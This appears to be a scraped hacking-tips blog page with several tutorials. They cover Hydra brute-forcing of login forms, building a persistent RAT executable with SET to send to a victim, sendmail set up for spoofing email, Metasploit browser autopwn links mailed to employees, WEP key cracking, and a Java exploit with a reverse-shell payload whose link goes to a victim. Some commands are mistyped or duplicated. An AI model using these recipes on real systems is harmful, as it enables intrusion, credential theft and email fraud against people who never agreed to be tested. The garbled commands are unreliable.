Brute-Force attack using HYDRA

<div dir="ltr" style="text-align: left;" trbidi="on"><h3 style="text-align: left;">What is BRUTE-FORCE attack ?</h3><br />A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.<br /><br /><h3 style="text-align: left;">How to install THC-hydra ?</h3><br />Open your terminal & type following command<br /><br />(1)sudo bash<br /><br />(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz<br /><br />(3)After downloading ,we are going to extract it<br /><br />tar -xvf hydra-6.3-src.tar.gz<br /><br />(4)tar -xvf hydra-6.3-src.tar.gz<br /><br />(5)./configure && make && install<br /><br />(6)make install<br /><br /><br /><h3 style="text-align: left;">How to use THC-hydra?</h3><br />If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)<br /><br />Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.<br /><br />Type following command in terminal<br /><br />hydra -l admin -P /root/pass  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnNE7GTPVhtjN2r0EOchrPiGdDZvfLDexx1Srjk6gkRluI7Tn6BLG3S9an6mZC0n4DP_Q1zWGwIkkkaC3qe7TsMDQjupQCa3s4_HPnW5-mOdpVjKg3L-yoh7iondcKsYC_Vi7mP7QGd844/s1600/hydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="hydra-bruteforce" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnNE7GTPVhtjN2r0EOchrPiGdDZvfLDexx1Srjk6gkRluI7Tn6BLG3S9an6mZC0n4DP_Q1zWGwIkkkaC3qe7TsMDQjupQCa3s4_HPnW5-mOdpVjKg3L-yoh7iondcKsYC_Vi7mP7QGd844/s1600/hydra.PNG" title="hydra-bruteforce" /></a></div><br />The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login). <br /><br />The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always) <br /><br />If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp". <br /><br />Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code. <br /><br />They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are. <br /><br />Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra<br /><br />-vV - The verbose mode. This mode shows you every login attempt hydra tries. <br /><br />-s - We specify the port on which we're running our attack.<br /><br />-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.<br /><br />-R - Restores a previously aborted session of an attack.<br /><br />-e ns - Checks for blank or no password fields.<br /><br /></div>

Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ? A password attack that does not attempt to decrypt any information, but continue to try different passwords. Fo...

+ Read more »

How to use R.A.T. through S.E.T?

<div dir="ltr" style="text-align: left;" trbidi="on">RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).<br /><br />(1)Open your terminal & type<br /><br />cd /opt/set<br /><br />./set<br /><br />(2)update your set<br /><br />(3)Now select option 3 which is Third party Modules<br /><br />(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).<br /><br />(5)Enter I.P. Address of your computer to connect back<br /><br />(6)Port RATTE Server should listen on [8080]: press enter<br /><br />(7)Should RATTE be persistent [no|yes]?:yes<br /><br />(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe<br /><br />(9) Payload has been exported to src/program_junk/ratteM.exe<br /><br />(10)Now send your ratteM.exe files to victim, as soon as they download and open it<br /><br />Start the ratteserver listener now [yes|no]:yes<br /><br />(11)chose 1 option which is list client<br /><br />(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here<br /><br />Now choose option2 “activate client”<br /><br />Now you get menu with lots of menu. Select 1st option which is start shell.</div>

How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made ...

+ Read more »

How to install & configure send mail in Ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on">Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.<br /><br /><h3 style="text-align: left;">How to Install Send-Mail?</h3><br />Open terminal & type following command in terminal.<br /><br />sudo apt-get install mailutils<br /><br />sudo apt-get install sendmail<br /><br /><br /><h3 style="text-align: left;">How to configure it?</h3><br />After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.<br /><br />Type following command on terminal<br /><br />sudo gedit /etc/mail/sendmail.mc<br /><br />It will open sendmail.mc file.<br /><br />For example your last two lines are as follow<br /><br />MAILER(`local')dnl<br /><br />MAILER(`smtp')dnl<br /><br />Put this code before that two lines.<br /><br />MAILER_DEFINITIONS<br /><br />define('SMART_HOST',`smtp.gmail.com')<br /><br />Ok. now close that file<br /><br />Now we will generate configure file from .mc file so type following command in terminal.<br /><br />sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'<br /><br />Now everything is complete, try to send mail using terminal or use <a href="http://tipstrickshack.blogspot.com/2012/12/how-to-install-social-engineering.html" target="_blank">Social Engineering Tool-Kit</a> as i mention in previous post. <br /><br /><br /><h3 style="text-align: left;">How to send mail through Command?</h3><br />open terminal and type following command.<br /><br />telnet 127.0.0.1 25<br /><br />HELO server<br /><br />MAIL from:sender`s email address<br /><br />RCPT to: Recipient address<br /><br />DATA<br /><br />Subject:Test mail<br /><br />from: sender`s email address<br /><br />to: receiver`s address<br /><br />Test Mail <br /><br />.<br /><br />quit<br /><br /><br />Now check spam folder of receiver`s email , you got email . Now check show original option of email , you can see that i.p. of computer , o.s. , many other things. <br /><br /></div>

How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our...

+ Read more »

How to install social engineering toolkit(S.E.T.) in ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on">Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .<br /><br /><a href="http://tipstrickshack.blogspot.com/2013/01/how-to-move-set-to-github.html" target="_blank">Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.</a> <br /><br />Extra package which is necessary to use SET effectively are as follow.<br /><br />(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu <a href="http://tipstrickshack.blogspot.com/2012/09/how-to-install-metasploit-in-ubuntu.html" target="_blank">here</a>.<br /><br />(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.<br /><br />To install Ettercap open terminal in type following command:-<br /><br />sudo apt-get install ettercap<br /><br />(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal<br /><br />sudo apt-get install openjdk-6-jdk<br /><br /><br />Now open terminal & change directory to opt.<br /><br />sudo bash<br /><br />cd /opt<br /><br />svn co <a href="http://svn.secmaniac.com/social_engineering_toolkit%20set/" target="_blank">http://svn.secmaniac.com/social_engineering_toolkit set/</a><br /><br />cd /opt/set<br /><br />svn update<br /><br />nano config/set_config<br /><br />Now we will configure it. First it require metaspolit path . So we will put it on configure file. Here comes problem , in first step we install metasploit , it`s directory is opt/metasploit-4.4.0/msf3. But when we put this path in configure file it cannot detect metasploit . So we have to rename metasploit-4.4.0 to framework3. So rename metasploit-4.4.0 folder name to framework3.<br /><br />Put opt/framework3/msf3 this path in config file. Save it.Type in terminal.<br /><br />./set<br /><br />It will open SET .<br /><br />In next tutorial I will show you how to configure sendmail & use it in set.<br /><br />I Know I cannot explain good, So if you face any problem please mention in comment.<br /><br /><a href="http://tipstrickshack.blogspot.com/2013/01/how-to-move-set-to-github.html" target="_blank">Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.</a></div>

How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other ...

+ Read more »

How to scan web-server with Nikto?

<div dir="ltr" style="text-align: left;" trbidi="on">Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.<br /><br />Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).<br /><br />Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.<br /><br />Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify potential vulnerabilities<br /><br /> Download Nikto from <a href="http://www.cirt.net/nikto/nikto-2.1.5.tar.gz" target="_blank">here</a>.<br /><br /> Open terminal & extract it in folder<br /><br /> Then change directory, type following code in terminal<br /><br />    cd Downloads/nikto-2.1.5<br /><br /> Make nikto.pl file exectuable(right click on file, & make it executable)<br /><br /> Update it by typing following command<br /><br />    ./nikto.pl -update<br /><br /> Now final step to scan webhost type following in termina<br /><br />   ./nikto.pl -host I.p</div>

How to scan web-server with Nikto?

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6...

+ Read more »

how to Browser Autopwn attack in metasploit?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module. </span></span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPe-psk1sMcEI9KUAEvTmSGgginsUYbSZSRJuk65WakQi2PmvZtX9k8qNpW0PWz0c_oqs2Vjc9HYNNMOC2LE2tV0rE3vxWpJu35bHi3Ft0yvBdEvzo-4AU2HwIsbyki_Z5aHuawva6doI/s1600/129.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-autopwn" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPe-psk1sMcEI9KUAEvTmSGgginsUYbSZSRJuk65WakQi2PmvZtX9k8qNpW0PWz0c_oqs2Vjc9HYNNMOC2LE2tV0rE3vxWpJu35bHi3Ft0yvBdEvzo-4AU2HwIsbyki_Z5aHuawva6doI/s1600/129.png" title="metasploit-autopwn" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div><a name="more"></a><br /><div class="separator" style="clear: both; text-align: center;"></div><div style="margin-bottom: 0in;"><span style="font-family: 'Bitstream Charter', serif; font-size: medium;">We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.</span><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjla7HQy3E5TTXiIlXLWOcy3Xr9LK0iZFjbIBW4Sg3kIaifQ_7g44dcRp3Bch44Hr6J5Pmkxlx3_gqh78fNItQ1x4LBaogxGe2VQ7XHjm85P4dFetjulJSaTD2dJCvx9mULNkzqhBpMxCuN/s1600/216.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-autopwn" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjla7HQy3E5TTXiIlXLWOcy3Xr9LK0iZFjbIBW4Sg3kIaifQ_7g44dcRp3Bch44Hr6J5Pmkxlx3_gqh78fNItQ1x4LBaogxGe2VQ7XHjm85P4dFetjulJSaTD2dJCvx9mULNkzqhBpMxCuN/s1600/216.png" title="metasploit-autopwn-1" /></a></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server. </span></span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-QSCAHUtyjnCATCCXnkYxKWAqkJirTGx-PRk0dkc_8pXg6WHIJUEIOoBbKJMSG-TV1qohDvSwb0CIguXZ2Pge8xnLw2Qoq9hRwvKUHz7pQA2xuDWKJufelyOzr6ePFS6yOqpKk_FT_spt/s1600/410.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-autopwn" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-QSCAHUtyjnCATCCXnkYxKWAqkJirTGx-PRk0dkc_8pXg6WHIJUEIOoBbKJMSG-TV1qohDvSwb0CIguXZ2Pge8xnLw2Qoq9hRwvKUHz7pQA2xuDWKJufelyOzr6ePFS6yOqpKk_FT_spt/s1600/410.png" title="metasploit-autopwn-2" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open. </span></span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8B0O5w4TdomH1f-OaA8FF_6i5aUzwCWpy99apziusEX6oAOHtWKklUPWQJHJV6X1YB7xCv9ggjaTKM8DMeUFPxDSOYVUeff3FJCSo8SYyyhtGU3Uq0KqYluxAqoYiMjp2xGoFtc8J5C_/s1600/39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-autopwn" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN8B0O5w4TdomH1f-OaA8FF_6i5aUzwCWpy99apziusEX6oAOHtWKklUPWQJHJV6X1YB7xCv9ggjaTKM8DMeUFPxDSOYVUeff3FJCSo8SYyyhtGU3Uq0KqYluxAqoYiMjp2xGoFtc8J5C_/s1600/39.png" title="metasploit-autopwn-3" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.</span></span></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuUCJPeyEwovlz5J_2cW81ToNndLlK5wZxS8tUGMeUPvHceWFBTFeRElgaKMFZNuS1m6LRMUyJ_BVtg8-6VoJj9crpzJsidT1H8TDN6CpRQJPW7T-gV65EAxhCEvXRZByRiEZVUx5o2mMc/s1600/67.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="metasploit-autopwn" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuUCJPeyEwovlz5J_2cW81ToNndLlK5wZxS8tUGMeUPvHceWFBTFeRElgaKMFZNuS1m6LRMUyJ_BVtg8-6VoJj9crpzJsidT1H8TDN6CpRQJPW7T-gV65EAxhCEvXRZByRiEZVUx5o2mMc/s1600/67.png" title="metasploit-autopwn-5" /></a></div></div>

how to Browser Autopwn attack in metasploit?

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates ...

+ Read more »

How to crack wi-fi password in ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)install aircrack</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">sudo apt-get install aircrack-ng </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2) You need to go in root first. For this purpose type “su –“ and type your password. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)now type following command in terminal</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Code: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"># iwconfig wlan0 mode monitoring </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Code: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"># airodump-ng wlan0 </span></span><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirM4FuPXfBBR-YW6oh4KtxWngTxK8HJSr5kSE1FCNtONDizkIwuhftKn3TqH12l3c75gSMV8PVi7OtFzxYlrCpjRC9PnJQ5iSf8IuyiURBsvhbq44wx-FlHLkTxOZB3iKvw12rXYnyHetl/s1600/be11f84f0e27d568.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="crack-wi-fi-password-in-ubuntu" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirM4FuPXfBBR-YW6oh4KtxWngTxK8HJSr5kSE1FCNtONDizkIwuhftKn3TqH12l3c75gSMV8PVi7OtFzxYlrCpjRC9PnJQ5iSf8IuyiURBsvhbq44wx-FlHLkTxOZB3iKvw12rXYnyHetl/s1600/be11f84f0e27d568.jpg" title="crack-wi-fi-password-in-ubuntu" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><a name="more"></a><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(5)Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Code: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"># airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0 </span></span><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkTFEiJ6oFocu0T62IV9aDwCyvRMKQr2JoSVdOQze8Alai-R2F1IGabkGZMeceULwGuRtKpIVSyolhdOBONPHzBV-AXtouvdQZEgROyo7tY8xx8_Ji9ZbQXY68JTFZ2f8R_LFAylIEA9E/s1600/8875fd4ff599432c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="crack-wi-fi-password-in-ubuntu" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkTFEiJ6oFocu0T62IV9aDwCyvRMKQr2JoSVdOQze8Alai-R2F1IGabkGZMeceULwGuRtKpIVSyolhdOBONPHzBV-AXtouvdQZEgROyo7tY8xx8_Ji9ZbQXY68JTFZ2f8R_LFAylIEA9E/s1600/8875fd4ff599432c.jpg" title="crack-wi-fi-password-in-ubuntu-2" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(6)Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Code: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"># aireplay-ng -3 –b 00:15:EB:E7: … wlan0 </span></span><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKASYu-HCotZWJ3iI9DetjnkS74ao2ecfzN15dRfdVswZW3fVi3Xp_h_rIdLi0uEx1bXXN2y4Spjw3h8MKd0FJpA72ZhJlPJI0WJtRyezKO0_IgdOPi990myC3A6-K8HLN7Y_QKn8P3nfx/s1600/b15c84ed10ebe1ee.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="crack-wi-fi-password-in-ubuntu" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKASYu-HCotZWJ3iI9DetjnkS74ao2ecfzN15dRfdVswZW3fVi3Xp_h_rIdLi0uEx1bXXN2y4Spjw3h8MKd0FJpA72ZhJlPJI0WJtRyezKO0_IgdOPi990myC3A6-K8HLN7Y_QKn8P3nfx/s1600/b15c84ed10ebe1ee.jpg" title="crack-wi-fi-password-in-ubuntu-3" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(7)Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng. </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Code: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"># aircrack-ng wep-03.cap </span></span><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1H3Cl11kMgJDJPpxMW6oSS-CxU7p3Gg3BVsi1PKMYOS0fCwwNBiW5YyfsoUifp08UtKI5Bez00LE5gztAgp3fxAANsX0acdaezeABQGQ3yHn8H5fLByKzFtJS3Up2VRK-7FDNDqmjhg9d/s1600/537f3d09952d7c01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="crack-wi-fi-password-in-ubuntu" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1H3Cl11kMgJDJPpxMW6oSS-CxU7p3Gg3BVsi1PKMYOS0fCwwNBiW5YyfsoUifp08UtKI5Bez00LE5gztAgp3fxAANsX0acdaezeABQGQ3yHn8H5fLByKzFtJS3Up2VRK-7FDNDqmjhg9d/s1600/537f3d09952d7c01.jpg" title="crack-wi-fi-password-in-ubuntu-4" /></a></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Then you should see that the key has been decrypted 100% successfully and the key itself.</span></span></div></div>

How to crack wi-fi password in ubuntu?

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s (1)install aircrack sudo apt-get install airc...

+ Read more »

How to use latest java vulnerability to hack remote p.c. ?

<div dir="ltr" style="text-align: left;" trbidi="on">Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.<br /><br />(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal<br /><br />(2)Now after update type msfconsole<br /><br />(3)type use exploit/multi/browser/java_jre17_jaxws<br /><br />(4)set payload java/shell_reverse_tcp<br /><br />(5)set lhost 223.232.185.97(your I.p)<br /><br />(6)set srvhost 223.232.185.97(server I.p.)<br /><br />(7)set uripath /<br /><br />(8)exploit<br /><br />Now an URL you should give to your victim http://223.232.185.97:8080/<br /><br />Now send link to victim. When victim open your link, you have access of victim` s computer.<br /><br />(9)type sessions -l<br /><br />(10)the Session number to connect to the session. And Now Type sessions -i ID</div>

How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability i...

+ Read more »

How to crack any hash with help of online services?

